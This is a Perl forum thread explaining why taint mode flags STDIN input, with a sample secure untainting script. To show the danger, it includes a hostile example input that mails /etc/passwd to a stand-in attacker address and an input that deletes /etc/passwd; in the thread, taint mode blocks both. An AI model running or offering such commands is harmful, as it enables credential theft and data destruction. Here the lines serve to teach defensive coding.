in reply to Re^4: Insecure dependency in open
in thread Insecure dependency in open

It's dangerous because it comes from a dirty, untrustworthy, malicious creature (i.e. the user). They can feed in anything they want on STDIN:

$ perl -T -le 'chomp(my $foo = <STDIN>); unlink( $foo ) or die "unlink: $!\n";'
/etc/passwd
Insecure dependency in unlink while running with -T switch at -e line 1, <STDIN> line 1.

$ perl -T -le '$ENV{PATH}="/bin:/usr/bin"; chomp(my $foo = <STDIN>); open( FOO, $foo ) or die "open: $!\n";'
mail blackhat@evilhaxor.org -s `uname -n` < /etc/passwd ; cat /dev/null |
Insecure dependency in piped open while running with -T switch at -e line 1, <STDIN> line 1.

If you want to allow this, you have to explicitly validate (by means of some form of untainting) the input; and on your head be it if you do it wrong.

Update: And as to your question about -t STDIN, that shouldn't be a problem because it's testing a property of the handle not using any input from the handle.

$ perl -T -le 'print "tty" if -t STDIN'
tty
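The following script is an added example, not code from the original thread or from any of the posters: it shows what "explicitly validate by means of some form of untainting" looks like in practice. Under -T the only thing that clears the taint flag on a value is a regex capture, so the pattern has to be restrictive enough that nothing Perl's two-argument open() would treat as a mode or a pipe can survive it. The base directory, the script name and the character class are assumptions chosen for the example.

```perl
#!/usr/bin/perl -T
# Added example (not part of the original thread): read a filename from
# STDIN under taint mode, untaint it with a restrictive regex capture, then
# open it with the three-argument form so the mode cannot come from the data.
# Run as:  echo somefile.txt | perl -T untaint.pl
use strict;
use warnings;
use Scalar::Util qw(tainted);

# Taint mode also refuses to trust %ENV when spawning anything, so pin PATH
# and drop the variables the shell would read (same as the one-liner above).
$ENV{PATH} = '/bin:/usr/bin';
delete @ENV{qw(IFS CDPATH ENV BASH_ENV)};

# Directory we are willing to serve files from (assumption for this example).
my $BASE = '/var/tmp/uploads';

chomp(my $raw = <STDIN> // '');
print "raw input is ", (tainted($raw) ? '' : 'not '), "tainted\n";

# Untaint: a single path component, first character alphanumeric or '_',
# then up to 63 characters from a small safe set. This rejects leading dots
# (so no '..'), slashes, whitespace, backticks, ';', '|', '<' and '>', i.e.
# everything that turns open(FOO, $foo) into a pipe or a truncation.
my $name;
if ($raw =~ m{\A([A-Za-z0-9_][A-Za-z0-9_.-]{0,63})\z}) {
    $name = $1;    # the capture is untainted; $raw itself still is tainted
} else {
    die "rejected input: not a plain filename\n";
}
print "untainted name is ", (tainted($name) ? '' : 'not '), "tainted\n";

# Three-argument open with an explicit '<' mode: even if the regex above were
# later loosened, the filename can no longer smuggle in a mode or a pipe.
my $path = "$BASE/$name";
open(my $fh, '<', $path) or die "open $path: $!\n";
print while <$fh>;
close $fh;
```

Feed it the same line the one-liner in this post was given (`mail blackhat@evilhaxor.org -s `uname -n` < /etc/passwd ; cat /dev/null |`) and the regex rejects it before open() is ever reached; feed it `notes.txt` and the capture comes out untainted while the original $raw stays tainted. Note that the shebang carries -T, so invoking it as plain `perl untaint.pl` dies with "Too late for -T switch"; run it with `perl -T` explicitly or via the shebang.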

Re^6: Insecure dependency in open
by argv (Pilgrim) on Jan 22, 2007 at 22:07 UTC
    Whoops! Completely disregard this post. I thought at the time that perl wasn't even letting me read from STDIN but it is. That changes my recently follow-up question thread, which can now be discarded. (I thought perl wasn't letting me set a variable from STDIN.). Mea culpa. More later...

      I don't yet see how calling $filename = <STDIN> is any different than saying $filename = $ENV{HOME}.

      They're not.

      >echo "input" | perl -T -e "use Scalar::Util qw( tainted ); my $var = <STDIN>; print(tainted($var)?1:0, qq{\n})"
      1
      >set VAR=input & perl -T -e "use Scalar::Util qw( tainted ); my $var = $ENV{VAR}; print(tainted($var)?1:0, qq{\n})"
      1